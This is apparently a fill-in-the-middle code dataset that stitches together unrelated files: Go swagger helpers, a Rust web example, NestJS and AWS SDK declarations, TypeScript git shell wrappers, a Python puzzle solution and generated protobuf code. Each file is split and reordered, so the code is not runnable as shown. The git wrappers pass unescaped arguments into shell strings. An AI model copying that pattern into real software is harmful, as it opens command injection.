swgName, swgOk := fullyQualifiedNameToSwaggerName(ref, reg)
if !swgOk {
glog.Errorf("can't resolve swagger name from CustomRef '%v'", ref)
continue
}
if _, ok := d[swgName]; ok {
// Skip already existing definitions
delete(refs, ref)
continue
}
msg, err := reg.LookupMsg("", ref)
if err == nil {
msgMap[swgName] = msg
continue
}
enum, err := reg.LookupEnum("", ref)
if err == nil {
enumMap[swgName] = enum
continue
}
// Should not happen: the ref is expected to resolve to either a message or an enum.
}
renderMessagesAsDefinition(msgMap, d, reg, refs)
renderEnumerationsAsDefinition(enumMap, d, reg)
// Run again in case any new refs were added
addCustomRefs(d, reg, refs)
}
func lowerCamelCase(fieldName string, fields []*descriptor.Field, msgs []*descriptor.Message) string {
for _, oneField := range fields {
if oneField.GetName() == fieldName {
return oneField.GetJsonName()
}
}
messageNameToFieldsToJSONName := make(map[string]map[string]string)
fieldNameToType := make(map[string]string)
for _, msg := range msgs {
fieldNameToJSONName := make(map[string]string)
for _, oneField := range msg.GetField() {
fieldNameToJSONName[oneField.GetName()] = oneField.GetJsonName()
fieldNameToType[oneField.GetName()] = oneField.GetTypeName()
}
messageNameToFieldsToJSONName[msg.GetName()] = fieldNameToJSONName
}
if strings.Contains(fieldName, ".") {
fieldNames := strings.Split(fieldName, ".")
fieldNamesWithCamelCase := make([]string, 0)
for i := 0; i < len(fieldNames)-1; i++ {
fieldNamesWithCamelCase = append(fieldNamesWithCamelCase, doCamelCase(fieldNames[i]))
}
prefix := strings.Join(fieldNamesWithCamelCase, ".")
reservedJSONName := getReservedJSONName(fieldName, messageNameToFieldsToJSONName, fieldNameToType)
if reservedJSONName != "" {
return prefix + "." + reservedJSONName
}
}
return doCamelCase(fieldName)
}
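// For example (illustrative, assuming casing.Camel("foo_bar") yields "FooBar"):
//
//	doCamelCase("foo_bar") // "fooBar"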
func doCamelCase(input string) string {
parameterString := casing.Camel(input)
builder := &strings.Builder{}
builder.WriteString(strings.ToLower(string(parameterString[0])))
builder.WriteString(parameterString[1:])
return builder.String()
}
func getReservedJSONName(fieldName string, messageNameToFieldsToJSONName map[string]map[string]string, fieldNameToType map[string]string) string {
if len(strings.Split(fieldName, ".")) == 2 {
fieldNames := strings.Split(fieldName, ".")
firstVariable := fieldNames[0]
firstType := fieldNameToType[firstVariable]
firstTypeShortNames := strings.Split(firstType, ".")
firstTypeShortName := firstTypeShortNames[len(firstTypeShortNames)-1]
return messageNameToFieldsToJSONName[firstTypeShortName][fieldNames[1]]
}
fieldNames := strings.Split(fieldName, ".")
return getReservedJSONName(strings.Join(fieldNames[1:], "."), messageNameToFieldsToJSONName, fieldNameToType)
} | }
|
main.rs | #![allow(unused_must_use)]
#[macro_use]
extern crate rbatis;
use once_cell::sync::Lazy;
use salvo::prelude::*;
use rbatis::crud::CRUD;
use rbatis::rbatis::Rbatis;
#[crud_table]
#[derive(Clone, Debug)]
pub struct BizActivity {
pub id: Option<String>,
pub name: Option<String>,
pub pc_link: Option<String>,
pub h5_link: Option<String>,
pub pc_banner_img: Option<String>,
pub h5_banner_img: Option<String>,
pub sort: Option<String>,
pub status: Option<i32>,
pub remark: Option<String>,
pub create_time: Option<rbatis::DateTimeNative>,
pub version: Option<i32>,
pub delete_flag: Option<i32>,
}
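// Global Rbatis instance, initialized lazily on first use.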
pub static RB: Lazy<Rbatis> = Lazy::new(|| Rbatis::new());
#[fn_handler]
async fn hello(res: &mut Response) |
#[tokio::main]
pub async fn main() -> Result<(), Box<dyn std::error::Error + Send + Sync>> {
fast_log::init(fast_log::config::Config::new().console());
log::info!("linking database...");
let rb = example::init_sqlite_path("").await;
drop(rb);
RB.link("sqlite://target/sqlite.db").await.expect("rbatis link database fail");
log::info!("linking database successful!");
let addr = "127.0.0.1:8000";
let server = Server::new(TcpListener::bind(addr)).serve(Router::new().handle(hello));
println!("Listening on http://{}", addr);
server.await;
Ok(())
}
| {
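// Fetch all BizActivity rows and render them as a JSON response.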
let v = RB.fetch_list::<BizActivity>().await.unwrap_or_default();
res.render_json(&v)
} |
document.controller.d.ts | /// <reference types="multer" />
import { DocumentService } from './document.service';
import { CreateDocumentDto } from './dto/create-document.dto';
import { HelperService } from '../common/helper';
import { JwtService } from '@nestjs/jwt';
export declare class | {
private readonly documentService;
private jwtService;
private helperService;
constructor(documentService: DocumentService, jwtService: JwtService, helperService: HelperService);
create(createDocumentDto: CreateDocumentDto): string;
accountStatus(body: any): Promise<{
status: boolean;
data: {};
} | {
status: boolean;
data: {
user_status: string;
driver_status: string;
};
}>;
updateStatus(body: any): Promise<{
status: boolean;
message: string;
}>;
uploadFile(body: any, files: Array<Express.Multer.File>): Promise<{
status: boolean;
message: any;
}>;
}
| DocumentController |
config.rs | // Code generated by software.amazon.smithy.rust.codegen.smithy-rs. DO NOT EDIT. | pub(crate) endpoint_resolver: ::std::sync::Arc<dyn aws_endpoint::ResolveAwsEndpoint>,
pub(crate) region: Option<aws_types::region::Region>,
pub(crate) credentials_provider:
std::sync::Arc<dyn aws_auth::provider::AsyncProvideCredentials>,
}
impl std::fmt::Debug for Config {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
let mut config = f.debug_struct("Config");
config.finish()
}
}
impl Config {
pub fn builder() -> Builder {
Builder::default()
}
/// The signature version 4 service signing name to use in the credential scope when signing requests.
///
/// The signing service may be overridden by the `Endpoint`, or by specifying a custom [`SigningService`](aws_types::SigningService) during
/// operation construction.
pub fn signing_service(&self) -> &'static str {
"machinelearning"
}
}
#[derive(Default)]
pub struct Builder {
endpoint_resolver: Option<::std::sync::Arc<dyn aws_endpoint::ResolveAwsEndpoint>>,
region: Option<aws_types::region::Region>,
credentials_provider: Option<std::sync::Arc<dyn aws_auth::provider::AsyncProvideCredentials>>,
}
impl Builder {
pub fn new() -> Self {
Self::default()
}
pub fn endpoint_resolver(
mut self,
endpoint_resolver: impl aws_endpoint::ResolveAwsEndpoint + 'static,
) -> Self {
self.endpoint_resolver = Some(::std::sync::Arc::new(endpoint_resolver));
self
}
pub fn region(mut self, region_provider: impl aws_types::region::ProvideRegion) -> Self {
self.region = region_provider.region();
self
}
/// Set the credentials provider for this service
pub fn credentials_provider(
mut self,
credentials_provider: impl aws_auth::provider::AsyncProvideCredentials + 'static,
) -> Self {
self.credentials_provider = Some(std::sync::Arc::new(credentials_provider));
self
}
pub fn build(self) -> Config {
Config {
endpoint_resolver: self
.endpoint_resolver
.unwrap_or_else(|| ::std::sync::Arc::new(crate::aws_endpoint::endpoint_resolver())),
region: {
use aws_types::region::ProvideRegion;
self.region
.or_else(|| aws_types::region::default_provider().region())
},
credentials_provider: self
.credentials_provider
.unwrap_or_else(|| std::sync::Arc::new(aws_auth::provider::default_provider())),
}
}
} | pub struct Config { |
git.ts | import * as shell from './shell';
/**
* Clones a repository from GitHub. Requires a `GITHUB_TOKEN` env variable.
*
* @param repositoryUrl the repository to clone.
* @param targetDir the clone directory.
*/
export function clone(repositoryUrl: string, targetDir: string) {
const gitHubToken = process.env.GITHUB_TOKEN;
if (!gitHubToken) {
throw new Error('GITHUB_TOKEN env variable is required');
}
shell.run(`git clone https://${gitHubToken}@${repositoryUrl}.git ${targetDir}`);
}
/**
* Query the git index for changes.
*
* @return True if changes exist, False otherwise.
*/
export function diffIndex(): boolean {
try {
shell.run('git diff-index --exit-code HEAD --');
return false;
} catch (err) {
return true;
}
}
/**
* Add files to the index.
*
* @param p the path.
*/
export function add(p: string) {
shell.run(`git add ${p}`);
}
/**
* Commit.
*
* @param message the commit message.
*/
export function commit(message: string) {
shell.run(`git commit -m "${message}"`);
}
/**
* Initialize a repository.
*/
export function init() {
shell.run('git init');
}
/**
* Create a tag.
*
* @param name tag name.
* @returns true if the tag was created, false if it already exists.
*/
export function tag(name: string): boolean {
try {
shell.run(`git tag -a ${name} -m ${name}`, { capture: true });
return true;
} catch (e) {
if (e.message.includes('already exists')) {
return false;
}
throw e;
}
}
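// Example usage (illustrative):
//
//   if (!tag('v1.2.3')) {
//     console.log('tag v1.2.3 already exists');
//   }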
/**
* Push a ref to origin.
*
* @param ref the ref
*/
export function push(ref: string) {
shell.run(`git push origin ${ref}`);
}
/**
* Check out a branch. Creates a new one if `options.createIfMissing` is true and the branch doesn't exist.
*
* @param branch the branch.
* @param options options.
*/
export function checkout(branch: string, options: { createIfMissing?: boolean }) {
if (options.createIfMissing) {
try {
shell.run(`git show-branch origin/${branch}`);
} catch (e) {
if (e instanceof Error && e.message.includes('fatal: bad sha1 reference')) {
console.log('Remote branch not found, creating new branch.');
shell.run(`git checkout -B ${branch}`);
return;
}
}
}
shell.run(`git checkout ${branch}`);
}
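// Example usage (illustrative):
//
//   checkout('release/v1', { createIfMissing: true });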
/**
* Fetch the configured git user name for the current directory.
* Returns undefined if not configured.
*/
export function username() {
try {
return shell.run('git config user.name', { capture: true });
} catch (err) {
console.warn(err.message);
return undefined;
}
}
/**
* Fetch the configured git user email for the current directory.
* Returns undefined if not configured.
*/
export function | () {
try {
return shell.run('git config user.email', { capture: true });
} catch (err) {
console.warn(err.message);
return undefined;
}
}
/**
* Identify the committer with a username and email.
*
* @param user the username.
* @param address the email address.
*/
export function identify(user: string, address: string) {
shell.run(`git config user.name "${user}"`);
shell.run(`git config user.email "${address}"`);
} | email |
ex9095.py | # BOJ 9095: 1, 2, 3 Addition ("1, 2, 3 더하기")
T = int(input()) # the number of test cases T is given
sum_list = []
for i in range(T):
n = int(input())
sum_list.append(n)
def oneTwoThreeSum(n):
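# Recurrence: f(n) = f(n-1) + f(n-2) + f(n-3), with base cases f(1)=1, f(2)=2, f(3)=4.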
if n == 1:
return 1
| oneTwoThreeSum(k))
| if n == 2:
return 2
if n == 3:
return 4
else:
return oneTwoThreeSum(n-3) + oneTwoThreeSum(n-2) + oneTwoThreeSum(n-1)
for k in sum_list:
print( |
carbonapi.pb.go | // Code generated by protoc-gen-gogo.
// source: carbonapi.proto
// DO NOT EDIT!
/*
Package carbonapipb is a generated protocol buffer package.
It is generated from these files:
carbonapi.proto
It has these top-level messages:
AccessLogDetails
*/
package carbonapipb
import proto "github.com/gogo/protobuf/proto"
import fmt "fmt"
import math "math"
import io "io"
// Reference imports to suppress errors if they are not otherwise used.
var _ = proto.Marshal
var _ = fmt.Errorf
var _ = math.Inf
// This is a compile-time assertion to ensure that this generated file
// is compatible with the proto package it is being compiled against.
// A compilation error at this line likely means your copy of the
// proto package needs to be updated.
const _ = proto.GoGoProtoPackageIsVersion2 // please upgrade the proto package
type AccessLogDetails struct {
Handler string `protobuf:"bytes,1,opt,name=handler,proto3" json:"handler,omitempty"`
CarbonapiUuid string `protobuf:"bytes,2,opt,name=carbonapi_uuid,json=carbonapiUuid,proto3" json:"carbonapi_uuid,omitempty"`
Username string `protobuf:"bytes,3,opt,name=username,proto3" json:"username,omitempty"`
Url string `protobuf:"bytes,4,opt,name=url,proto3" json:"url,omitempty"`
PeerIp string `protobuf:"bytes,5,opt,name=peer_ip,json=peerIp,proto3" json:"peer_ip,omitempty"`
PeerPort string `protobuf:"bytes,6,opt,name=peer_port,json=peerPort,proto3" json:"peer_port,omitempty"`
Host string `protobuf:"bytes,7,opt,name=host,proto3" json:"host,omitempty"`
Referer string `protobuf:"bytes,8,opt,name=referer,proto3" json:"referer,omitempty"`
Format string `protobuf:"bytes,9,opt,name=format,proto3" json:"format,omitempty"`
UseCache bool `protobuf:"varint,10,opt,name=use_cache,json=useCache,proto3" json:"use_cache,omitempty"`
Targets []string `protobuf:"bytes,11,rep,name=targets" json:"targets,omitempty"`
CacheTimeout int32 `protobuf:"varint,12,opt,name=cache_timeout,json=cacheTimeout,proto3" json:"cache_timeout,omitempty"`
Metrics []string `protobuf:"bytes,13,rep,name=metrics" json:"metrics,omitempty"`
HaveNonFatalErrors bool `protobuf:"varint,14,opt,name=have_non_fatal_errors,json=haveNonFatalErrors,proto3" json:"have_non_fatal_errors,omitempty"`
Runtime float64 `protobuf:"fixed64,15,opt,name=runtime,proto3" json:"runtime,omitempty"`
HttpCode int32 `protobuf:"varint,16,opt,name=http_code,json=httpCode,proto3" json:"http_code,omitempty"`
CarbonzipperResponseSizeBytes int64 `protobuf:"varint,17,opt,name=carbonzipper_response_size_bytes,json=carbonzipperResponseSizeBytes,proto3" json:"carbonzipper_response_size_bytes,omitempty"`
CarbonapiResponseSizeBytes int64 `protobuf:"varint,18,opt,name=carbonapi_response_size_bytes,json=carbonapiResponseSizeBytes,proto3" json:"carbonapi_response_size_bytes,omitempty"`
Reason string `protobuf:"bytes,19,opt,name=reason,proto3" json:"reason,omitempty"`
SendGlobs bool `protobuf:"varint,20,opt,name=send_globs,json=sendGlobs,proto3" json:"send_globs,omitempty"`
From int32 `protobuf:"varint,21,opt,name=from,proto3" json:"from,omitempty"`
Until int32 `protobuf:"varint,22,opt,name=until,proto3" json:"until,omitempty"`
Tz string `protobuf:"bytes,23,opt,name=tz,proto3" json:"tz,omitempty"`
FromRaw string `protobuf:"bytes,24,opt,name=from_raw,json=fromRaw,proto3" json:"from_raw,omitempty"`
UntilRaw string `protobuf:"bytes,25,opt,name=until_raw,json=untilRaw,proto3" json:"until_raw,omitempty"`
Uri string `protobuf:"bytes,26,opt,name=uri,proto3" json:"uri,omitempty"`
FromCache bool `protobuf:"varint,27,opt,name=from_cache,json=fromCache,proto3" json:"from_cache,omitempty"`
ZipperRequests int64 `protobuf:"varint,28,opt,name=zipper_requests,json=zipperRequests,proto3" json:"zipper_requests,omitempty"`
}
func (m *AccessLogDetails) Reset() { *m = AccessLogDetails{} }
func (m *AccessLogDetails) String() string { return proto.CompactTextString(m) }
func (*AccessLogDetails) ProtoMessage() {}
func (*AccessLogDetails) Descriptor() ([]byte, []int) { return fileDescriptorCarbonapi, []int{0} }
func (m *AccessLogDetails) GetHandler() string {
if m != nil {
return m.Handler
}
return ""
}
func (m *AccessLogDetails) GetCarbonapiUuid() string {
if m != nil {
return m.CarbonapiUuid
}
return ""
}
func (m *AccessLogDetails) GetUsername() string {
if m != nil {
return m.Username
}
return ""
}
func (m *AccessLogDetails) GetUrl() string {
if m != nil {
return m.Url
}
return ""
}
func (m *AccessLogDetails) GetPeerIp() string {
if m != nil {
return m.PeerIp
}
return ""
}
func (m *AccessLogDetails) GetPeerPort() string {
if m != nil {
return m.PeerPort
}
return ""
}
func (m *AccessLogDetails) GetHost() string {
if m != nil {
return m.Host
}
return ""
}
func (m *AccessLogDetails) GetReferer() string {
if m != nil {
return m.Referer
}
return ""
}
func (m *AccessLogDetails) GetFormat() string {
if m != nil {
return m.Format
}
return ""
}
func (m *AccessLogDetails) GetUseCache() bool {
if m != nil {
return m.UseCache
}
return false
}
func (m *AccessLogDetails) GetTargets() []string {
if m != nil {
return m.Targets
}
return nil
}
func (m *AccessLogDetails) GetCacheTimeout() int32 {
if m != nil {
return m.CacheTimeout
}
return 0
}
func (m *AccessLogDetails) GetMetrics() []string {
if m != nil {
return m.Metrics
}
return nil
}
func (m *AccessLogDetails) GetHaveNonFatalErrors() bool {
if m != nil {
return m.HaveNonFatalErrors
}
return false
}
func (m *AccessLogDetails) GetRuntime() float64 {
if m != nil {
return m.Runtime
}
return 0
}
func (m *AccessLogDetails) GetHttpCode() int32 {
if m != nil {
return m.HttpCode
}
return 0
}
func (m *AccessLogDetails) GetCarbonzipperResponseSizeBytes() int64 {
if m != nil {
return m.CarbonzipperResponseSizeBytes
}
return 0
}
func (m *AccessLogDetails) GetCarbonapiResponseSizeBytes() int64 {
if m != nil {
return m.CarbonapiResponseSizeBytes
}
return 0
}
func (m *AccessLogDetails) GetReason() string {
if m != nil {
return m.Reason
}
return ""
}
func (m *AccessLogDetails) GetSendGlobs() bool {
if m != nil {
return m.SendGlobs
}
return false
}
func (m *AccessLogDetails) GetFrom() int32 {
if m != nil {
return m.From
}
return 0
}
func (m *AccessLogDetails) GetUntil() int32 {
if m != nil {
return m.Until
}
return 0
}
func (m *AccessLogDetails) GetTz() string {
if m != nil {
return m.Tz
}
return ""
}
func (m *AccessLogDetails) GetFromRaw() string {
if m != nil {
return m.FromRaw
}
return ""
}
func (m *AccessLogDetails) GetUntilRaw() string {
if m != nil {
return m.UntilRaw
}
return ""
}
func (m *AccessLogDetails) GetUri() string {
if m != nil {
return m.Uri
}
return ""
}
func (m *AccessLogDetails) GetFromCache() bool {
if m != nil {
return m.FromCache
}
return false
}
func (m *AccessLogDetails) GetZipperRequests() int64 {
if m != nil {
return m.ZipperRequests
}
return 0
}
func init() {
proto.RegisterType((*AccessLogDetails)(nil), "carbonapipb.AccessLogDetails")
}
func (m *AccessLogDetails) Marshal() (dAtA []byte, err error) {
size := m.Size()
dAtA = make([]byte, size)
n, err := m.MarshalTo(dAtA)
if err != nil {
return nil, err
}
return dAtA[:n], nil
}
func (m *AccessLogDetails) MarshalTo(dAtA []byte) (int, error) {
var i int
_ = i
var l int
_ = l
if len(m.Handler) > 0 {
dAtA[i] = 0xa
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.Handler)))
i += copy(dAtA[i:], m.Handler)
}
if len(m.CarbonapiUuid) > 0 {
dAtA[i] = 0x12
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.CarbonapiUuid)))
i += copy(dAtA[i:], m.CarbonapiUuid)
}
if len(m.Username) > 0 {
dAtA[i] = 0x1a
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.Username)))
i += copy(dAtA[i:], m.Username)
}
if len(m.Url) > 0 {
dAtA[i] = 0x22
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.Url)))
i += copy(dAtA[i:], m.Url)
}
if len(m.PeerIp) > 0 {
dAtA[i] = 0x2a
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.PeerIp)))
i += copy(dAtA[i:], m.PeerIp)
}
if len(m.PeerPort) > 0 {
dAtA[i] = 0x32
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.PeerPort)))
i += copy(dAtA[i:], m.PeerPort)
}
if len(m.Host) > 0 {
dAtA[i] = 0x3a
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.Host)))
i += copy(dAtA[i:], m.Host)
}
if len(m.Referer) > 0 {
dAtA[i] = 0x42
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.Referer)))
i += copy(dAtA[i:], m.Referer)
}
if len(m.Format) > 0 {
dAtA[i] = 0x4a
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.Format)))
i += copy(dAtA[i:], m.Format)
}
if m.UseCache {
dAtA[i] = 0x50
i++
if m.UseCache {
dAtA[i] = 1
} else {
dAtA[i] = 0
}
i++
}
if len(m.Targets) > 0 {
for _, s := range m.Targets {
dAtA[i] = 0x5a
i++
l = len(s)
for l >= 1<<7 {
dAtA[i] = uint8(uint64(l)&0x7f | 0x80)
l >>= 7
i++
}
dAtA[i] = uint8(l)
i++
i += copy(dAtA[i:], s)
}
}
if m.CacheTimeout != 0 {
dAtA[i] = 0x60
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(m.CacheTimeout))
}
if len(m.Metrics) > 0 {
for _, s := range m.Metrics {
dAtA[i] = 0x6a
i++
l = len(s)
for l >= 1<<7 {
dAtA[i] = uint8(uint64(l)&0x7f | 0x80)
l >>= 7
i++
}
dAtA[i] = uint8(l)
i++
i += copy(dAtA[i:], s)
}
}
if m.HaveNonFatalErrors {
dAtA[i] = 0x70
i++
if m.HaveNonFatalErrors {
dAtA[i] = 1
} else {
dAtA[i] = 0
}
i++
}
if m.Runtime != 0 {
dAtA[i] = 0x79
i++
i = encodeFixed64Carbonapi(dAtA, i, uint64(math.Float64bits(float64(m.Runtime))))
}
if m.HttpCode != 0 {
dAtA[i] = 0x80
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(m.HttpCode))
}
if m.CarbonzipperResponseSizeBytes != 0 {
dAtA[i] = 0x88
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(m.CarbonzipperResponseSizeBytes))
}
if m.CarbonapiResponseSizeBytes != 0 {
dAtA[i] = 0x90
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(m.CarbonapiResponseSizeBytes))
}
if len(m.Reason) > 0 {
dAtA[i] = 0x9a
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.Reason)))
i += copy(dAtA[i:], m.Reason)
}
if m.SendGlobs {
dAtA[i] = 0xa0
i++
dAtA[i] = 0x1
i++
if m.SendGlobs {
dAtA[i] = 1
} else {
dAtA[i] = 0
}
i++
}
if m.From != 0 {
dAtA[i] = 0xa8
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(m.From))
}
if m.Until != 0 {
dAtA[i] = 0xb0
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(m.Until))
}
if len(m.Tz) > 0 {
dAtA[i] = 0xba
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.Tz)))
i += copy(dAtA[i:], m.Tz)
}
if len(m.FromRaw) > 0 {
dAtA[i] = 0xc2
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.FromRaw)))
i += copy(dAtA[i:], m.FromRaw)
}
if len(m.UntilRaw) > 0 {
dAtA[i] = 0xca
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.UntilRaw)))
i += copy(dAtA[i:], m.UntilRaw)
}
if len(m.Uri) > 0 {
dAtA[i] = 0xd2
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(len(m.Uri)))
i += copy(dAtA[i:], m.Uri)
}
if m.FromCache {
dAtA[i] = 0xd8
i++
dAtA[i] = 0x1
i++
if m.FromCache {
dAtA[i] = 1
} else {
dAtA[i] = 0
}
i++
}
if m.ZipperRequests != 0 {
dAtA[i] = 0xe0
i++
dAtA[i] = 0x1
i++
i = encodeVarintCarbonapi(dAtA, i, uint64(m.ZipperRequests))
}
return i, nil
}
func | (dAtA []byte, offset int, v uint64) int {
dAtA[offset] = uint8(v)
dAtA[offset+1] = uint8(v >> 8)
dAtA[offset+2] = uint8(v >> 16)
dAtA[offset+3] = uint8(v >> 24)
dAtA[offset+4] = uint8(v >> 32)
dAtA[offset+5] = uint8(v >> 40)
dAtA[offset+6] = uint8(v >> 48)
dAtA[offset+7] = uint8(v >> 56)
return offset + 8
}
func encodeFixed32Carbonapi(dAtA []byte, offset int, v uint32) int {
dAtA[offset] = uint8(v)
dAtA[offset+1] = uint8(v >> 8)
dAtA[offset+2] = uint8(v >> 16)
dAtA[offset+3] = uint8(v >> 24)
return offset + 4
}
func encodeVarintCarbonapi(dAtA []byte, offset int, v uint64) int {
for v >= 1<<7 {
dAtA[offset] = uint8(v&0x7f | 0x80)
v >>= 7
offset++
}
dAtA[offset] = uint8(v)
return offset + 1
}
func (m *AccessLogDetails) Size() (n int) {
var l int
_ = l
l = len(m.Handler)
if l > 0 {
n += 1 + l + sovCarbonapi(uint64(l))
}
l = len(m.CarbonapiUuid)
if l > 0 {
n += 1 + l + sovCarbonapi(uint64(l))
}
l = len(m.Username)
if l > 0 {
n += 1 + l + sovCarbonapi(uint64(l))
}
l = len(m.Url)
if l > 0 {
n += 1 + l + sovCarbonapi(uint64(l))
}
l = len(m.PeerIp)
if l > 0 {
n += 1 + l + sovCarbonapi(uint64(l))
}
l = len(m.PeerPort)
if l > 0 {
n += 1 + l + sovCarbonapi(uint64(l))
}
l = len(m.Host)
if l > 0 {
n += 1 + l + sovCarbonapi(uint64(l))
}
l = len(m.Referer)
if l > 0 {
n += 1 + l + sovCarbonapi(uint64(l))
}
l = len(m.Format)
if l > 0 {
n += 1 + l + sovCarbonapi(uint64(l))
}
if m.UseCache {
n += 2
}
if len(m.Targets) > 0 {
for _, s := range m.Targets {
l = len(s)
n += 1 + l + sovCarbonapi(uint64(l))
}
}
if m.CacheTimeout != 0 {
n += 1 + sovCarbonapi(uint64(m.CacheTimeout))
}
if len(m.Metrics) > 0 {
for _, s := range m.Metrics {
l = len(s)
n += 1 + l + sovCarbonapi(uint64(l))
}
}
if m.HaveNonFatalErrors {
n += 2
}
if m.Runtime != 0 {
n += 9
}
if m.HttpCode != 0 {
n += 2 + sovCarbonapi(uint64(m.HttpCode))
}
if m.CarbonzipperResponseSizeBytes != 0 {
n += 2 + sovCarbonapi(uint64(m.CarbonzipperResponseSizeBytes))
}
if m.CarbonapiResponseSizeBytes != 0 {
n += 2 + sovCarbonapi(uint64(m.CarbonapiResponseSizeBytes))
}
l = len(m.Reason)
if l > 0 {
n += 2 + l + sovCarbonapi(uint64(l))
}
if m.SendGlobs {
n += 3
}
if m.From != 0 {
n += 2 + sovCarbonapi(uint64(m.From))
}
if m.Until != 0 {
n += 2 + sovCarbonapi(uint64(m.Until))
}
l = len(m.Tz)
if l > 0 {
n += 2 + l + sovCarbonapi(uint64(l))
}
l = len(m.FromRaw)
if l > 0 {
n += 2 + l + sovCarbonapi(uint64(l))
}
l = len(m.UntilRaw)
if l > 0 {
n += 2 + l + sovCarbonapi(uint64(l))
}
l = len(m.Uri)
if l > 0 {
n += 2 + l + sovCarbonapi(uint64(l))
}
if m.FromCache {
n += 3
}
if m.ZipperRequests != 0 {
n += 2 + sovCarbonapi(uint64(m.ZipperRequests))
}
return n
}
func sovCarbonapi(x uint64) (n int) {
for {
n++
x >>= 7
if x == 0 {
break
}
}
return n
}
func sozCarbonapi(x uint64) (n int) {
return sovCarbonapi(uint64((x << 1) ^ uint64((int64(x) >> 63))))
}
func (m *AccessLogDetails) Unmarshal(dAtA []byte) error {
l := len(dAtA)
iNdEx := 0
for iNdEx < l {
preIndex := iNdEx
var wire uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
wire |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
fieldNum := int32(wire >> 3)
wireType := int(wire & 0x7)
if wireType == 4 {
return fmt.Errorf("proto: AccessLogDetails: wiretype end group for non-group")
}
if fieldNum <= 0 {
return fmt.Errorf("proto: AccessLogDetails: illegal tag %d (wire type %d)", fieldNum, wire)
}
switch fieldNum {
case 1:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Handler", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Handler = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 2:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field CarbonapiUuid", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.CarbonapiUuid = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 3:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Username", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Username = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 4:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field Url", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.Url = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 5:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field PeerIp", wireType)
}
var stringLen uint64
for shift := uint(0); ; shift += 7 {
if shift >= 64 {
return ErrIntOverflowCarbonapi
}
if iNdEx >= l {
return io.ErrUnexpectedEOF
}
b := dAtA[iNdEx]
iNdEx++
stringLen |= (uint64(b) & 0x7F) << shift
if b < 0x80 {
break
}
}
intStringLen := int(stringLen)
if intStringLen < 0 {
return ErrInvalidLengthCarbonapi
}
postIndex := iNdEx + intStringLen
if postIndex > l {
return io.ErrUnexpectedEOF
}
m.PeerIp = string(dAtA[iNdEx:postIndex])
iNdEx = postIndex
case 6:
if wireType != 2 {
return fmt.Errorf("proto: wrong wireType = %d for field PeerPort", wireType)
}
